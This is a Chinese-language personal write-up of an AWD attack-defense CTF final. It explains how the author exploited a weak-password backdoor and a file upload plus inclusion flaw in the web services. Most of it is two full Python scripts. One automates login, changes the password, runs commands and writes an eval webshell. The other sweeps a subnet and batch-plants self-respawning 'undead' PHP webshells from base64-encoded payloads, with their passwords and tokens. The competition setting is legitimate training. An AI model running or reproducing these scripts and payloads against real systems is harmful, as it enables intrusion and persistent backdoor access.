关于参加2023年江西省大学生信息安全技术大赛决赛AWD个人思路
有本科和专科组 比赛有60多个组 一个组3个人 权限为普通用户没有sudo权限
由于比赛结束了 那个系统就进不了 了
# WEB1
连接服务器查看运行了什么服务** ps -aux** 或者是通过端口查看**netstat -antlp** 打包网站源码 **tar -zcvf web.tar.gz /var/www/html** 把源码下载到本地用D盾扫描一下
发现存在后门查看一下在/var/www/html/admin/vip.php文件
但是这个后门在后台找到后台
这边是存在弱口令爆破admin用户密码为q1w2e3r4t5
来到/admin/vip.php这边通过源码看出来Cookie的值username=admin;password=q1w2e3r4t5传参就可以RCE
这边的话我是进了后台修改了弱口令防止别人也利用 比赛密码不要设置112233.com的弱口令 可以看到这边POST请求传值执行了phpinfo(); 获取flag的话执行system('curl xxx');就可以了 这边是可以写脚本批量化的 由于我的代码水平有限写出了勉强够用的 如下:
import requests
proxies = {
'http': 'http://127.0.0.1:8080'
}
f = open('url.txt', 'r', encoding='utf-8')
for i in f:
i = i.strip()
line = i
poc1 = line +'/admin/login.php'
def login():
f = open('url.txt', 'r', encoding='utf-8')
for i in f:
i = i.strip()
line = i
poc1 = line + '/admin/login.php'
headres = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type': 'application/x-www-form-urlencoded'
}
data = 'id=1&username=admin&password=q1w2e3r4t5'
#print(poc1)
res = requests.post(url=poc1, proxies=proxies, data=data, headers=headres).status_code
if res ==200:
new_login_pass()
else:
print('密码错误')
def new_login_pass():
f = open('url.txt', 'r', encoding='utf-8')
for i in f:
i = i.strip()
line = i
poc2 = line + '/admin/upadmin.php'
headres = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'username=admin; password=q1w2e3r4t5'
}
data ='id=1&username=admin&password=112233.com'
res = requests.post(url=poc2,data=data,proxies=proxies,headers=headres).status_code
if res ==200:
get_shell()
else:
pass
def get_shell():
f = open('url.txt', 'r', encoding='utf-8')
for i in f:
i = i.strip()
line = i
poc3 = line + '/admin/vip.php'
headres = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'username=admin; password=112233.com;'
}
data = "system('cat /flag');"
res =requests.post(url=poc3,data=data,proxies=proxies,headers=headres).text
if "flag" in res:
print("命令执行成功")
web_shell()
else:
pass
def web_shell():
f = open('url.txt', 'r', encoding='utf-8')
for i in f:
i = i.strip()
line = i
poc3 = line + '/admin/vip.php'
headres = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'username=admin; password=112233.com;'
}
data = "system('echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >.1.php');"
proxies = {
'http': 'http://127.0.0.1:8080'
}
res = requests.post(url=poc3, data=data, proxies=proxies, headers=headres).text
if __name__ == '__main__':
login()
配合写webshell在比赛前写好的脚本批量写不死马
import concurrent.futures
import time
import requests
import os
import threading
import re
proxy={'http':'http://127.0.0.1:8080'}
# def aa():
# res = requests.get(url='http://www.baidu.com',proxies=proxy)
# print(res.status_code)
hander = {
'Content-Type': 'application/x-www-form-urlencoded'
}
def get_ip(ip,wangduan):
a = wangduan
b = a.split('.') #以点分割字符串
del b[-1] #去掉最后一个
new_ip = '.'.join(b)+'.'+ip #跑网段内的ip
return1 = os.popen(f'ping {new_ip} -n 2') # 执行ping命令 2表示ping2次
if 'TTL' in return1.read(): # 根据ttl判断是否存在
with open('ip_true','a+') as f:
print(new_ip)
f.write(new_ip+"\n")
def ip(): #多线程快速探索本网段ip
duan = input('输入本机IP:')
evnet = threading.Event()
for i in range(1,255):
threading.Thread(target=get_ip, args=(str(i),duan)).start()
evnet.set()
def shel(i,path,payload):
try:
url = 'http://' + i + path
res = requests.post(url=url, data=payload, timeout=3,headers=hander)
print(i + ' 成功写入不死马')
try:
if 200 == res.status_code: #看写入的不死马是否成功
print(i + '++++++++++++++++++++++成功执行不死马')
requests.get(url='http://' + i + '/You_is_Dsb.php',timeout=1) #访问执行不死马是默认超时的
except:
file = open('nodie_shell', 'r').read().split('\n')
if i not in file: #判断已执行不死马ip是否存在,存在则不写入
with open('nodie_shell', 'a+') as f:
f.write(i + "\n")
except Exception as a:
print(f'访问默认后门出错ip :{i}')
def shell():
cmd = input('输入默认后门的密码 :')
path = input('输入后门路径,例如 /einf/dine.php :')
#传参不需base64:
#payload = {cmd : "$abc = 'You_is_Dsb.php';$data = 'PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CiAgICAkZmlsZSA9IGZvcGVuKCItZGVidWdfYmFja3RyYWNlLnBocCIsICJ3Iik7CiAgICAkdHh0ID0gIlBEOXdhSEFnQ2tCbGNuSnZjbDl5WlhCdmNuUnBibWNvTUNrN0NpUmhJRDBnSW40clpDZ3BJbDRpSVhzcmUzMGlPd29rWWlBOUlDUjdKR0Y5V3pjMU9Ea3dNVjA3Q21WMllXd29JbHh1SWk0aVhISWlMaVJpS1RzS1B6ND0iOwogICAgJGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCR0eHQpOwogICAgZndyaXRlKCRmaWxlLCAkY29udGVudCk7CiAgICBmY2xvc2UoJGZpbGUpOwoJCXVzbGVlcCgxMDAwKTsKCX0KPz4=';$detxt = base64_decode($data);file_put_contents($abc, $detxt);echo 'successfully.';"}
# 写入文件You_is_Dsb.php,激活不死马会有自删除功能,不断生成"-debug_backtrace.php",密码758901
#不死马传参需base64编码:
# payload = {cmd : "$abc = 'You_is_Dsb.php';$data = 'PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CiAgICAkZmlsZSA9IGZvcGVuKCItZGVidWdfYmFja3RyYWNlLnBocCIsICJ3Iik7CiAgICAkdHh0ID0gIlBEOXdhSEFLUUdWeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzS0pHRWdQU0FpZml0a0tDa2lYaUloZXl0N2ZTSTdDaVJpSUQwZ0pIc2tZWDFiTnpVNE9UQXhYVHNLSkdJZ1BTQmlZWE5sTmpSZlpHVmpiMlJsS0NSaUtUc0taWFpoYkNnaVhHNGlMaUpjY2lJdUpHSXBPd28vUGc9PSI7CiAgICAkY29udGVudCA9IGJhc2U2NF9kZWNvZGUoJHR4dCk7CiAgICBmd3JpdGUoJGZpbGUsICRjb250ZW50KTsKICAgIGZjbG9zZSgkZmlsZSk7CgkJdXNsZWVwKDEwMDApOwoJfQo/Pg==';$detxt = base64_decode($data);file_put_contents($abc, $detxt);echo 'successfully.';"}
# 写入文件You_is_Dsb.php,激活不死马会有自删除功能,不断生成"-debug_backtrace.php",密码758901
payload = {cmd: "$abc = 'You_is_Dsb.php';$data = 'PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CiAgICAkZmlsZSA9IGZvcGVuKCIuZGVidWdfYmFja3RyYWNlLnBocCIsICJ3Iik7CiAgICAkdHh0ID0gIlBEOXdhSEFLQ2tCbGNuSnZjbDl5WlhCdmNuUnBibWNvTUNrN0NpUmxlSEJsWTNSbFpGUnZhMlZ1SUQwZ0oxaFpXRTVvVFZSSk1GRjFkWFYxTnpNMGVUZ3paM0ozUFQwbk93cHBaaUFvYVhOelpYUW9KRjlUUlZKV1JWSmJKMGhVVkZCZlJFTlVUMHRGVGtWRUoxMHBJQ1ltSUNSZlUwVlNWa1ZTV3lkSVZGUlFYMFJEVkU5TFJVNUZSQ2RkSUQwOVBTQWtaWGh3WldOMFpXUlViMnRsYmlrZ2V3b0pKR1pwYm1RZ1BTQkFKRjlRVDFOVVd5ZFZNbFZwWkROcE1XUW5YVHNLQ1dWMllXd29KR1pwYm1RcE93cDlJR1ZzYzJVZ2V3b0pKSE4wWVhWelgyTnZaR1VnUFNBaVNGUlVVQzh4TGpFZ05EQTBJRTV2ZENCR2IzVnVaQ0k3Q2dsb1pXRmtaWElvSkhOMFlYVnpYMk52WkdVcE93b2dJQ0FnWlhocGRDZ3BPd3A5IjsKICAgICRjb250ZW50ID0gYmFzZTY0X2RlY29kZSgkdHh0KTsKICAgIGZ3cml0ZSgkZmlsZSwgJGNvbnRlbnQpOwogICAgZmNsb3NlKCRmaWxlKTsKCQl1c2xlZXAoMTAwMCk7Cgl9';$detxt = base64_decode($data);file_put_contents($abc, $detxt);echo 'successfully.';"}
#写入文件You_is_Dsb.php,激活不死马会有自删除功能,不断生成".debug_backtrace.php",密码U2Uid3i1d,需设置请求头"DCTOKENED",值为"XYXNhMTI0Quuuu734y83grw=="
file = open('ip_true', 'r').read().split('\n')
while True:
evnet = threading.Event()
for i in file:
time.sleep(0.25)
if i != '': #跳过空行
threading.Thread(target=shel, args=(i,path,payload)).start()
evnet.set()
if __name__ == '__main__':
#获取ip
#ip()
#执行不死马
shell()
代码由比赛的环境调试
实现登入弱口令修改弱口令执行命令上传webshell 这边也可以上不死马
这边修复的就是把eval注释掉就可以 比赛环境还有SSRF但是技术有限RCE不了
# WEB2
一样的思路运行了什么服务** ps -aux** 或者是通过端口查看**netstat -antlp** 打包网站源码 **tar -zcvf web.tar.gz /var/www/html** 把源码下载到本地用D盾扫描一下
这边是存在文件包含加文件上传 思路就是配合文件上传.md文件在利用文件包含 getshell
文件上传源代码
首先上传.md文件里面包含php代码包含执行
上传成功后把文件名重命名了一下 时间戳后md5加密 思路就是burp并发写个死循环运行查看时间戳整理一下md5加密在进行目录扫描获取文件名 比赛由于队伍较多可以写个脚本 批量并发同一时间上传这个包在进行目录扫描获取文件名获取到权限并且上传webshell
个人思路 比赛中有更厉害的师傅比我简单高效
#PWN
不会